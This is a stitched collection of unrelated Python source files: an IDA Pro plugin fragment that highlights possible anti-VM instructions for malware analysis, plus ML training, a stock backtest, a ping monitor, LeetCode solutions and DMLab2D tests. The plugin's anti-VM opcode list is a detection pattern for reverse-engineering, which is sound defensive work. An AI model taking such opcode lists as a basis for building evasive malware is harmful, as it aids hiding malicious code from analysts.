flags = idaapi.PLUGIN_UNL
comment = "Set colors :)"
help = "No help needed"
wanted_name = "FullColor"
wanted_hotkey = ""
def init(self):
#idaapi.msg("init() called!\n")
#self.run(0)
return idaapi.PLUGIN_OK
def run(self, arg=0):
print("hell2")
idaapi.msg("run() called with %d!\n" % arg)
heads = Heads(get_segm_start(get_screen_ea()), get_segm_end(get_screen_ea()))
funcCalls = []
xor = []
antiVM = []
for i in heads:
# Color the Calls off-white
if print_insn_mnem(i) == "call":
funcCalls.append(i)
# Color Anti-VM instructions Red and print their location
elif print_insn_mnem(i) in ("sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"):
antiVM.append(i)
# Color non-zeroing out xor instructions Orange
elif print_insn_mnem(i) == "xor" and (print_operand(i,0) != print_operand(i,1)):
xor.append(i)
print("Number of calls: %d" % (len(funcCalls)))
for i in funcCalls:
set_color(i, CIC_ITEM, 0xc7fdff)
print("Number of potential Anti-VM instructions: %d" % (len(antiVM)))
for i in antiVM:
print("Anti-VM potential at %x" % i)
set_color(i, CIC_ITEM, 0x0000ff)
print("Number of xor: %d" % (len(xor)))
for i in xor:
set_color(i, CIC_ITEM, 0x00a5ff)
def term(self):
idaapi.msg("term() called!\n")
def PLUGIN_ENTRY():
return FullColor_t()
if PLUGIN_TEST:
# Create form
f = PLUGIN_ENTRY()
f.init()
f.run()
f.term()
|
misc/pytorch_toolkit/chest_xray_screening/chest_xray_screening/train.py | e-ddykim/training_extensions | 256 | 12798788 | <reponame>e-ddykim/training_extensions<filename>misc/pytorch_toolkit/chest_xray_screening/chest_xray_screening/train.py
import numpy as np
import time
import os
import argparse
import torch
from torch.backends import cudnn
from torch import optim
import torch.nn.functional as tfunc
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import StepLR
from .utils.dataloader import RSNADataSet
from .utils.score import compute_auroc
from .utils.model import DenseNet121, DenseNet121Eff
from math import sqrt
import json
from tqdm import tqdm as tq
class RSNATrainer():
def __init__(self, model,
data_loader_train, data_loader_valid, data_loader_test,
class_count, checkpoint, device, class_names, lr):
self.gepoch_id = 0
self.device = device
self.model = model.to(self.device)
self.data_loader_train = data_loader_train
self.data_loader_valid = data_loader_valid
self.data_loader_test = data_loader_test
self.class_names = class_names
self.class_count = class_count
self.auroc_max = 0.0 # Setting maximum AUROC value as zero
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
if checkpoint is not None:
model_checkpoint = torch.load(checkpoint)
self.optimizer.load_state_dict(model_checkpoint['optimizer'])
else:
model_checkpoint = None
self.loss_fn = torch.nn.BCELoss()
def train(self, max_epoch, savepath):
train_loss_min = 1e+5 # A random very high number
valid_loss_min = 1e+5
for epoch_id in range(max_epoch):
print(f"Epoch {epoch_id+1}/{max_epoch}")
self.gepoch_id = epoch_id
train_loss, valid_loss, auroc_max = self.epoch_train()
self.current_train_loss = train_loss
self.current_valid_loss = valid_loss
timestamp_end = time.strftime("%H%M%S-%d%m%Y")
if train_loss < train_loss_min:
train_loss_min = train_loss
if valid_loss < valid_loss_min:
valid_loss_min = valid_loss
torch.save({'epoch': epoch_id + 1,
'state_dict': self.model.state_dict(),
'best_loss': valid_loss_min,
'optimizer' : self.optimizer.state_dict()},
os.path.join(savepath, f'm-epoch-{epoch_id}.pth'))
test_auroc = self.test()
print(f"Epoch:{epoch_id + 1}| EndTime:{timestamp_end}| TestAUROC: {test_auroc}| ValidAUROC: {auroc_max}")
def valid(self):
self.model.eval()
loss_valid_r = 0
valid_batches = 0 # Counter for valid batches
out_gt = torch.FloatTensor().to(self.device)
out_pred = torch.FloatTensor().to(self.device)
with torch.no_grad():
for (var_input, var_target) in tq(self.data_loader_valid):
var_target = var_target.to(self.device)
out_gt = torch.cat((out_gt, var_target), 0).to(self.device)
_, c, h, w = var_input.size()
var_input = var_input.view(-1, c, h, w)
var_output = self.model(var_input.to(self.device))
out_pred = torch.cat((out_pred, var_output), 0)
lossvalue = self.loss_fn(
var_output, tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float())
loss_valid_r += lossvalue.item()
valid_batches += 1
valid_loss = loss_valid_r / valid_batches
auroc_individual = compute_auroc(
tfunc.one_hot(out_gt.squeeze(1).long()).float(),
out_pred, self.class_count)
print(len(auroc_individual))
auroc_mean = np.array(auroc_individual).mean()
return valid_loss, auroc_mean
def epoch_train(self):
loss_train_list = []
loss_valid_list = []
self.model.train()
scheduler = StepLR(self.optimizer, step_size=6, gamma=0.002)
for batch_id, (var_input, var_target) in tq(enumerate(self.data_loader_train)):
var_target = var_target.to(self.device)
var_input = var_input.to(self.device)
var_output= self.model(var_input)
trainloss_value = self.loss_fn(
var_output,
tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float())
self.optimizer.zero_grad()
trainloss_value.backward()
self.optimizer.step()
train_loss_value = trainloss_value.item()
loss_train_list.append(train_loss_value)
if batch_id % (len(self.data_loader_train)-1) == 0 and batch_id != 0:
validloss_value, auroc_mean = self.valid()
loss_valid_list.append(validloss_value)
if auroc_mean > self.auroc_max:
print('Better auroc obtained')
self.auroc_max = auroc_mean
scheduler.step()
train_loss_mean = np.mean(loss_train_list)
valid_loss_mean = np.mean(loss_valid_list)
return train_loss_mean, valid_loss_mean, auroc_mean
def test(self):
cudnn.benchmark = True
out_gt = torch.FloatTensor().to(self.device)
out_pred = torch.FloatTensor().to(self.device)
self.model.eval()
with torch.no_grad():
for i, (var_input, var_target) in enumerate(self.data_loader_test):
var_target = var_target.to(self.device)
var_input = var_input.to(self.device)
out_gt = torch.cat((out_gt, var_target), 0).to(self.device)
_, c, h, w = var_input.size()
var_input = var_input.view(-1, c, h, w)
out = self.model(var_input)
out_pred = torch.cat((out_pred, out), 0)
auroc_individual = compute_auroc(tfunc.one_hot(out_gt.squeeze(1).long()).float(), out_pred, self.class_count)
auroc_mean = np.array(auroc_individual).mean()
print(f'AUROC mean:{auroc_mean}')
for i, auroc_val in enumerate(auroc_individual):
print(f"{self.class_names[i]}:{auroc_val}")
return auroc_mean
def main(args):
lr = args.lr
checkpoint = args.checkpoint
batch_size = args.bs
max_epoch = args.epochs
class_count = args.clscount #The objective is to classify the image into 3 classes
device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # use gpu if available
class_names = ['Lung Opacity', 'Normal', 'No Lung Opacity / Not Normal']
# Data Loader
dpath = args.dpath
img_pth = os.path.join(args.dpath, 'processed_data/')
numpy_path = os.path.join(args.dpath, 'data_split/')
with open(os.path.join(dpath, 'rsna_annotation.json')) as lab_file:
labels = json.load(lab_file)
# Place numpy file containing train-valid-test split on tools folder
tr_list = np.load(os.path.join(numpy_path,'train_list.npy')).tolist()
val_list = np.load(os.path.join(numpy_path,'valid_list.npy')).tolist()
test_list = np.load(os.path.join(numpy_path,'test_list.npy')).tolist()
dataset_train = RSNADataSet(tr_list, labels, img_pth, transform=True)
dataset_valid = RSNADataSet(val_list, labels, img_pth, transform=True)
data_loader_train = DataLoader(
dataset=dataset_train,
batch_size=batch_size,
shuffle=True,
num_workers=4,
pin_memory=False)
data_loader_valid = DataLoader(
dataset=dataset_valid,
batch_size=batch_size,
shuffle=False,
num_workers=4,
pin_memory=False)
dataset_test = RSNADataSet(test_list, labels, img_pth, transform=True)
data_loader_test = DataLoader(
dataset=dataset_test,
batch_size=1,
shuffle=False,
num_workers=4,
pin_memory=False)
# Construct Model
if args.optimised:
alpha = args.alpha
phi = args.phi
beta = args.beta
if beta is None:
beta = round(sqrt(2 / alpha), 3)
alpha = alpha ** phi
beta = beta ** phi
model = DenseNet121Eff(alpha, beta, class_count)
else:
model = DenseNet121(class_count)
# Train the Model
savepath = args.spath
rsna_trainer = RSNATrainer(
model, data_loader_train, data_loader_valid, data_loader_test,
class_count,checkpoint, device, class_names, lr)
rsna_trainer.train(max_epoch, savepath)
print("Model trained !")
if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--lr",
required=False,
help="Learning rate",
default=1e-4,
type = float)
parser.add_argument("--checkpoint",
required=False,
help="Checkpoint model weight",
default= None,
type = str)
parser.add_argument("--bs",
required=False,
default=16,
help="Batchsize",
type=int)
parser.add_argument("--dpath",
required=True,
help="Path to folder containing all data",
type =str)
parser.add_argument("--epochs",
required=False,
default=15,
help="Number of epochs",
type=int)
parser.add_argument("--clscount",
required=False,
default=3,
help="Number of classes",
type=int)
parser.add_argument("--spath",
required=True,
help="Path to folder in which models should be saved",
type =str)
parser.add_argument("--optimised",
required=False, default=False,
help="enable flag->eff model",
action='store_true')
parser.add_argument("--alpha",
required=False,
help="alpha for the model",
default=(11 / 6),
type=float)
parser.add_argument("--phi",
required=False,
help="Phi for the model.",
default=1.0,
type=float)
parser.add_argument("--beta",
required=False,
help="Beta for the model.",
default=None,
type=float)
custom_args = parser.parse_args()
main(custom_args)
|
Portfolio_Strategies/vectorized_backtesting.py | vhn0912/Finance | 441 | 12798800 | import numpy as np
import pandas as pd
import yfinance as yf
import matplotlib.pyplot as plt
import datetime
from yahoo_fin import stock_info as si
plt.rcParams['figure.figsize'] = (15, 10)
tickers = si.tickers_dow()
individual_stock = input(f"Which of the following stocks would you like to backtest \n{tickers}\n:")
num_of_years = 1
start = datetime.date.today() - datetime.timedelta(days = int(365.25*num_of_years))
yf_prices = yf.download(tickers, start=start)
# Individual Stock Strategy
prices = yf_prices['Adj Close'][individual_stock]
rs = prices.apply(np.log).diff(1).fillna(0)
w1 = 5
w2 = 22
ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean()
pos = ma_x.apply(np.sign)
fig, ax = plt.subplots(2,1)
ma_x.plot(ax=ax[0], title=f'{individual_stock} Moving Average Crossovers and Positions')
pos.plot(ax=ax[1])
plt.show()
my_rs = pos.shift(1)*rs
plt.subplots()
my_rs.cumsum().apply(np.exp).plot(title=f'{individual_stock} MA Strategy Performance')
rs.cumsum().apply(np.exp).plot()
plt.legend([f'{individual_stock} MA Performace', f'{individual_stock} Buy and Hold Performnace'])
plt.show()
print (f'Performance Statistics for {individual_stock} ({num_of_years} years):')
print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Buy and Hold Return: ' + str(100 * round(rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Full Portfolio Strategy
prices = yf_prices['Adj Close']
rs = prices.apply(np.log).diff(1).fillna(0)
w1 = 5
w2 = 22
ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean()
pos = ma_x.apply(np.sign)
pos /= pos.abs().sum(1).values.reshape(-1,1)
fig, ax = plt.subplots(2,1)
ma_x.plot(ax=ax[0], title='Individual Moving Average Crossovers and Positions')
ax[0].legend(bbox_to_anchor=(1.1, 1.05))
pos.plot(ax=ax[1])
ax[1].legend(bbox_to_anchor=(1.1, 1.05))
plt.show()
my_rs = (pos.shift(1)*rs)
my_rs.cumsum().apply(np.exp).plot(title='Individual Stocks Strategy Performance')
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {num_of_years} years:')
for i in range(len(tickers)):
print (f'Moving Average Return for {tickers[i]}: ' + str(100 * round(my_rs.cumsum().apply(np.exp)[tickers[i]].tolist()[-1], 4)) + '%')
i = i + 1
plt.subplots()
my_rs = (pos.shift(1)*rs).sum(1)
my_rs.cumsum().apply(np.exp).plot(title='Full Portfolio Strategy Performance')
rs.mean(1).cumsum().apply(np.exp).plot()
plt.legend(['Portfolio MA Performace', 'Buy and Hold Performnace'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Buy and Hold Return: ' + str(100 * round(rs.mean(1).cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Portfolio Tests
# Look-Ahead Bias
my_rs1 = (pos*rs).sum(1)
my_rs2 = (pos.shift(1)*rs).sum(1)
plt.subplots()
my_rs1.cumsum().apply(np.exp).plot(title='Full Portfolio Performance')
my_rs2.cumsum().apply(np.exp).plot()
plt.legend(['With Look-Ahead Bias', 'Without Look-Ahead Bias'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('With Look-Ahead Bias: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('Without Look-Ahead Bias: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
# Signal Lags
lags = range(1, 11)
lagged_rs = pd.Series(dtype=float, index=lags)
print ('-' * 60)
print (f'Lag Performance Statistics for {tickers} ({num_of_years} years):')
for lag in lags:
my_rs = (pos.shift(lag)*rs).sum(1)
my_rs.cumsum().apply(np.exp).plot()
lagged_rs[lag] = my_rs.sum()
print (f'Lag {lag} Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
plt.title('Full Portfolio Strategy Performance with Lags')
plt.legend(lags, bbox_to_anchor=(1.1, 0.95))
plt.show()
# Transaction Costs
tc_pct = 0.01
delta_pos = pos.diff(1).abs().sum(1)
my_tcs = tc_pct*delta_pos
my_rs1 = (pos.shift(1)*rs).sum(1)
my_rs2 = (pos.shift(1)*rs).sum(1) - my_tcs
plt.subplots()
my_rs1.cumsum().apply(np.exp).plot()
my_rs2.cumsum().apply(np.exp).plot()
plt.title('Full Portfolio Performance')
plt.legend(['Without Transaction Costs', 'With Transaction Costs'])
plt.show()
print ('-' * 60)
print (f'Performance Statistics for {tickers} ({num_of_years} years):')
print ('Without Transaction Costs: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
print('With Transaction Costs: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') |
integrations/pinger/pinger.py | hamptons/alerta-contrib | 114 | 12798802 | <filename>integrations/pinger/pinger.py
import sys
import platform
import time
import subprocess
import threading
import Queue
import re
import logging
import yaml
from alertaclient.api import Client
__version__ = '3.3.0'
LOG = logging.getLogger('alerta.pinger')
LOG.setLevel(logging.DEBUG)
LOG.addHandler(logging.StreamHandler())
PING_FILE = 'alert-pinger.targets'
PING_MAX_TIMEOUT = 15 # seconds
PING_MAX_RETRIES = 2
PING_SLOW_WARNING = 200 # ms
PING_SLOW_CRITICAL = 500 # ms
SERVER_THREAD_COUNT = 20
LOOP_EVERY = 30
_PING_ALERTS = [
'PingFailed',
'PingSlow',
'PingOK',
'PingError',
]
PING_OK = 0 # all ping replies received within timeout
PING_FAILED = 1 # some or all ping replies not received or did not respond within timeout
PING_ERROR = 2 # unspecified error with ping
# Initialise Rules
def init_targets():
targets = list()
LOG.info('Loading Ping targets...')
try:
targets = yaml.load(open(PING_FILE))
except Exception as e:
LOG.error('Failed to load Ping targets: %s', e)
LOG.info('Loaded %d Ping targets OK', len(targets))
return targets
class WorkerThread(threading.Thread):
def __init__(self, api, queue):
threading.Thread.__init__(self)
LOG.debug('Initialising %s...', self.getName())
self.last_event = {}
self.queue = queue # internal queue
self.api = api # message broker
def run(self):
while True:
LOG.debug('Waiting on input queue...')
item = self.queue.get()
if not item:
LOG.info('%s is shutting down.', self.getName())
break
environment, service, resource, retries, queue_time = item
if time.time() - queue_time > LOOP_EVERY:
LOG.warning('Ping request to %s expired after %d seconds.', resource, int(time.time() - queue_time))
self.queue.task_done()
continue
LOG.info('%s pinging %s...', self.getName(), resource)
if retries > 1:
rc, rtt, loss, stdout = self.pinger(resource, count=2, timeout=5)
else:
rc, rtt, loss, stdout = self.pinger(resource, count=5, timeout=PING_MAX_TIMEOUT)
if rc != PING_OK and retries:
LOG.info('Retrying ping %s %s more times', resource, retries)
self.queue.put((environment, service, resource, retries - 1, time.time()))
self.queue.task_done()
continue
if rc == PING_OK:
avg, max = rtt
if avg > PING_SLOW_CRITICAL:
event = 'PingSlow'
severity = 'critical'
text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_CRITICAL)
elif avg > PING_SLOW_WARNING:
event = 'PingSlow'
severity = 'warning'
text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_WARNING)
else:
event = 'PingOK'
severity = 'normal'
text = 'Node responding to ping avg/max %s/%s ms.' % tuple(rtt)
value = '%s/%s ms' % tuple(rtt)
elif rc == PING_FAILED:
event = 'PingFailed'
severity = 'major'
text = 'Node did not respond to ping or timed out within %s seconds' % PING_MAX_TIMEOUT
value = '%s%% packet loss' % loss
elif rc == PING_ERROR:
event = 'PingError'
severity = 'warning'
text = 'Could not ping node %s.' % resource
value = stdout
else:
LOG.warning('Unknown ping return code: %s', rc)
continue
# Defaults
resource += ':icmp'
group = 'Ping'
correlate = _PING_ALERTS
raw_data = stdout
try:
self.api.send_alert(
resource=resource,
event=event,
correlate=correlate,
group=group,
value=value,
severity=severity,
environment=environment,
service=service,
text=text,
event_type='serviceAlert',
raw_data=raw_data,
)
except Exception as e:
LOG.warning('Failed to send alert: %s', e)
self.queue.task_done()
LOG.info('%s ping %s complete.', self.getName(), resource)
self.queue.task_done()
@staticmethod
def pinger(node, count=1, interval=1, timeout=5):
if timeout <= count * interval:
timeout = count * interval + 1
if timeout > PING_MAX_TIMEOUT:
timeout = PING_MAX_TIMEOUT
if sys.platform == "darwin":
cmd = "ping -q -c %s -i %s -t %s %s" % (count, interval, timeout, node)
else:
cmd = "ping -q -c %s -i %s -w %s %s" % (count, interval, timeout, node)
ping = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout = ping.communicate()[0].rstrip('\n')
rc = ping.returncode
LOG.debug('Ping %s => %s (rc=%d)', cmd, stdout, rc)
m = re.search('(?P<loss>\d+(\.\d+)?)% packet loss', stdout)
if m:
loss = m.group('loss')
else:
loss = 'n/a'
m = re.search('(?P<min>\d+\.\d+)/(?P<avg>\d+\.\d+)/(?P<max>\d+\.\d+)/(?P<mdev>\d+\.\d+)\s+ms', stdout)
if m:
rtt = (float(m.group('avg')), float(m.group('max')))
else:
rtt = (0, 0)
if rc == 0:
LOG.info('%s: is alive %s', node, rtt)
else:
LOG.info('%s: not responding', node)
return rc, rtt, loss, stdout
class PingerDaemon(object):
def __init__(self):
self.shuttingdown = False
def run(self):
self.running = True
# Create internal queue
self.queue = Queue.Queue()
self.api = Client()
# Initialiase ping targets
ping_list = init_targets()
# Start worker threads
LOG.debug('Starting %s worker threads...', SERVER_THREAD_COUNT)
for i in range(SERVER_THREAD_COUNT):
w = WorkerThread(self.api, self.queue)
try:
w.start()
except Exception as e:
LOG.error('Worker thread #%s did not start: %s', i, e)
continue
LOG.info('Started worker thread: %s', w.getName())
while not self.shuttingdown:
try:
for p in ping_list:
if 'targets' in p and p['targets']:
for target in p['targets']:
environment = p['environment']
service = p['service']
retries = p.get('retries', PING_MAX_RETRIES)
self.queue.put((environment, service, target, retries, time.time()))
LOG.debug('Send heartbeat...')
try:
origin = '{}/{}'.format('pinger', platform.uname()[1])
self.api.heartbeat(origin, tags=[__version__])
except Exception as e:
LOG.warning('Failed to send heartbeat: %s', e)
time.sleep(LOOP_EVERY)
LOG.info('Ping queue length is %d', self.queue.qsize())
except (KeyboardInterrupt, SystemExit):
self.shuttingdown = True
LOG.info('Shutdown request received...')
self.running = False
for i in range(SERVER_THREAD_COUNT):
self.queue.put(None)
w.join()
def main():
pinger = PingerDaemon()
pinger.run()
if __name__ == '__main__':
main()
|
Python3/872.py | rakhi2001/ecom7 | 854 | 12798834 | <filename>Python3/872.py
__________________________________________________________________________________________________
sample 24 ms submission
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from collections import deque
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
def get_leafs(root):
if not root:
return []
if not root.left and not root.right:
return [root.val]
return get_leafs(root.left) + get_leafs(root.right)
return get_leafs(root1) == get_leafs(root2)
__________________________________________________________________________________________________
sample 12908 kb submission
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
return self.getleaf(root1) == self.getleaf(root2)
def getleaf(self, root):
if not root: return []
stack = [root]
out = []
while root.left:
stack.append(root.left)
root = root.left
while stack:
p = stack.pop()
if not p.left and not p.right:
out.append(p.val)
if p.right:
stack.append(p.right)
p = p.right
while p.left:
stack.append(p.left)
p = p.left
return out
__________________________________________________________________________________________________
|
test/simple_log/quick_start.py | lesteve/tensorwatch | 3,453 | 12798872 | <reponame>lesteve/tensorwatch<gh_stars>1000+
import tensorwatch as tw
import time
w = tw.Watcher(filename='test.log')
s = w.create_stream(name='my_metric')
#w.make_notebook()
for i in range(1000):
s.write((i, i*i))
time.sleep(1)
|
dmlab2d/dmlab2d_test.py | Robert-Held/lab2d | 377 | 12798894 | # Copyright 2019 The DMLab2D Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dmlab2d.dmlab2d."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from dm_env import test_utils
import numpy as np
import dmlab2d
from dmlab2d import runfiles_helper
class Dmlab2dDmEnvTest(test_utils.EnvironmentTestMixin, absltest.TestCase):
def make_object_under_test(self):
lab2d = dmlab2d.Lab2d(runfiles_helper.find(),
{'levelName': 'examples/level_api'})
return dmlab2d.Environment(lab2d, lab2d.observation_names(), 0)
class Dmlab2DTest(absltest.TestCase):
def _create_env(self, extra_settings=None):
settings = extra_settings.copy() if extra_settings else {}
settings['levelName'] = 'examples/level_api'
return dmlab2d.Lab2d(runfiles_helper.find(), settings)
def test_lab2d_environment_name(self):
self.assertEqual(self._create_env().name(), 'dmlab2d')
def test_lab2d_observation_names(self):
env = self._create_env()
self.assertEqual(env.observation_names(),
['VIEW' + str(i) for i in range(1, 6)])
def test_lab2d_observation_spec(self):
env = self._create_env()
self.assertEqual(
env.observation_spec('VIEW1'), {
'dtype': np.dtype('uint8'),
'shape': (1,)
})
self.assertEqual(
env.observation_spec('VIEW2'), {
'dtype': np.dtype('double'),
'shape': (2,)
})
self.assertEqual(
env.observation_spec('VIEW3'), {
'dtype': np.dtype('int32'),
'shape': (3,)
})
self.assertEqual(
env.observation_spec('VIEW4'), {
'dtype': np.dtype('int64'),
'shape': (4,)
})
# Text is stored in objects.
self.assertEqual(
env.observation_spec('VIEW5'), {
'dtype': np.dtype('O'),
'shape': ()
})
def test_lab2d_action_spec(self):
env = self._create_env()
self.assertEqual(env.action_discrete_names(), ['REWARD_ACT'])
self.assertEqual(
env.action_discrete_spec('REWARD_ACT'), {
'min': 0,
'max': 4
})
self.assertEqual(env.action_continuous_names(), ['OBSERVATION_ACT'])
self.assertEqual(
env.action_continuous_spec('OBSERVATION_ACT'), {
'min': -5,
'max': 5
})
self.assertEqual(env.action_text_names(), ['LOG_EVENT'])
def test_lab2d_start_environment(self):
env = self._create_env()
env.start(episode=0, seed=0)
def test_lab2d_events_start(self):
env = self._create_env()
env.start(episode=0, seed=0)
events = env.events()
self.assertLen(events, 1)
event_name, observations = events[0]
self.assertEqual(event_name, 'start')
self.assertLen(observations, 1)
np.testing.assert_array_equal(observations[0], [1, 2, 3])
def test_lab2d_events_cleared_after_advance_not_read(self):
env = self._create_env()
env.start(episode=0, seed=0)
self.assertLen(env.events(), 1)
self.assertLen(env.events(), 1)
env.advance()
self.assertEmpty(env.events())
def test_lab2d_observe(self):
env = self._create_env()
env.start(episode=0, seed=0)
np.testing.assert_array_equal(env.observation('VIEW1'), [1])
np.testing.assert_array_equal(env.observation('VIEW2'), [1, 2])
np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3])
np.testing.assert_array_equal(env.observation('VIEW4'), [1, 2, 3, 4])
self.assertEqual(env.observation('VIEW5'), b'')
def test_lab2d_ten_steps_terminate_environment(self):
env = self._create_env()
env.start(episode=0, seed=0)
for _ in range(9):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_settings_environment(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
for _ in range(4):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_properties_environment(self):
env = self._create_env({'steps': '5'})
properties = env.list_property('')
self.assertLen(properties, 1)
self.assertEqual(properties[0],
('steps', dmlab2d.PropertyAttribute.READABLE_WRITABLE))
self.assertEqual(env.read_property('steps'), '5')
env.write_property('steps', '3')
self.assertEqual(env.read_property('steps'), '3')
env.start(episode=0, seed=0)
for _ in range(2):
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
def test_lab2d_act_discrete(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
env.act_discrete(np.array([2], np.dtype('int32')))
_, reward = env.advance()
self.assertEqual(reward, 2)
def test_lab2d_act_continuous(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3])
env.act_continuous([10])
env.advance()
np.testing.assert_array_equal(env.observation('VIEW3'), [11, 12, 13])
def test_lab2d_act_text(self):
env = self._create_env({'steps': '5'})
env.start(episode=0, seed=0)
view = env.observation('VIEW5')
self.assertEqual(view, b'')
env.act_text(['Hello'])
env.advance()
view = env.observation('VIEW5')
self.assertEqual(view, b'Hello')
def test_lab2d_invalid_setting(self):
with self.assertRaises(ValueError):
self._create_env({'missing': '5'})
def test_lab2d_bad_action_spec_name(self):
env = self._create_env()
with self.assertRaises(KeyError):
env.action_discrete_spec('bad_key')
with self.assertRaises(KeyError):
env.action_continuous_spec('bad_key')
def test_lab2d_bad_observation_spec_name(self):
env = self._create_env()
with self.assertRaises(KeyError):
env.observation_spec('bad_key')
def test_lab2d_observe_before_start(self):
env = self._create_env()
with self.assertRaises(RuntimeError):
env.observation('VIEW1')
def test_lab2d_act_before_start(self):
env = self._create_env()
with self.assertRaises(RuntimeError):
env.act_discrete([0])
with self.assertRaises(RuntimeError):
env.act_continuous([0])
with self.assertRaises(RuntimeError):
env.act_text([''])
def test_lab2d_act_bad_shape(self):
env = self._create_env()
env.start(0, 0)
with self.assertRaises(ValueError):
env.act_discrete([0, 1])
with self.assertRaises(ValueError):
env.act_continuous([0, 1])
def test_lab2d_advance_after_episode_ends(self):
env = self._create_env({'steps': '2'})
env.start(0, 0)
self.assertEqual(env.advance()[0], dmlab2d.RUNNING)
self.assertEqual(env.advance()[0], dmlab2d.TERMINATED)
with self.assertRaises(RuntimeError):
env.advance()
def test_lab2d_missing_properties(self):
env = self._create_env({'steps': '5'})
with self.assertRaises(KeyError):
env.list_property('missing')
with self.assertRaises(KeyError):
env.read_property('missing')
with self.assertRaises(KeyError):
env.write_property('missing', '10')
def test_lab2d_invalid_ops_properties(self):
env = self._create_env({'steps': '5'})
with self.assertRaises(ValueError):
env.list_property('steps')
with self.assertRaises(ValueError):
env.write_property('steps', 'mouse')
if __name__ == '__main__':
absltest.main()
|
mozi/layers/normalization.py | hycis/Mozi | 122 | 12798961 | <gh_stars>100-1000
from mozi.layers.template import Template
from mozi.utils.theano_utils import shared_zeros, sharedX, shared_ones
from mozi.weight_init import UniformWeight
import theano.tensor as T
import theano
class BatchNormalization(Template):
def __init__(self, dim, layer_type, gamma_init=UniformWeight(), short_memory=0.01):
'''
REFERENCE:
Batch Normalization: Accelerating Deep Network Training by Reducing Internal Covariate Shift
PARAMS:
short_memory: short term memory
y_t is the latest value, the moving average x_tp1 is calculated as
x_tp1 = memory * y_t + (1-memory) * x_t, the larger the short term
memory, the more weight is put on contempory.
layer_type: fc or conv
epsilon:
denominator min value for preventing division by zero in computing std
dim: for fc layers, shape is the layer dimension, for conv layers,
shape is the number of feature maps
'''
assert layer_type in ['fc', 'conv']
self.layer_type = layer_type
self.epsilon = 1e-6
self.dim = dim
self.mem = short_memory
if self.layer_type == 'fc':
input_shape = (1, dim)
self.broadcastable = (True, False)
elif self.layer_type == 'conv':
input_shape = (1, dim, 1, 1)
self.broadcastable = (True, False, True, True)
self.gamma = gamma_init(input_shape, name='gamma')
self.beta = shared_zeros(input_shape, name='beta')
self.params = [self.gamma, self.beta]
self.moving_mean = 0
self.moving_var = 1
def _train_fprop(self, state_below):
if self.layer_type == 'fc':
miu = state_below.mean(axis=0)
var = T.mean((state_below - miu)**2, axis=0)
elif self.layer_type == 'conv':
miu = state_below.mean(axis=(0,2,3), keepdims=True)
var = T.mean((state_below - miu)**2, axis=(0,2,3), keepdims=True)
self.moving_mean = self.mem * miu + (1-self.mem) * self.moving_mean
self.moving_var = self.mem * var + (1-self.mem) * self.moving_var
Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon)
gamma = T.patternbroadcast(self.gamma, self.broadcastable)
beta = T.patternbroadcast(self.beta, self.broadcastable)
return gamma * Z + beta
def _test_fprop(self, state_below):
Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon)
gamma = T.patternbroadcast(self.gamma, self.broadcastable)
beta = T.patternbroadcast(self.beta, self.broadcastable)
return gamma * Z + beta
def _layer_stats(self, state_below, layer_output):
return [('moving_mean', T.mean(self.moving_mean)),
('moving_std', T.mean(self.moving_var)),
('gamma_mean', T.mean(self.gamma)),
('beta_mean', T.mean(self.beta)),
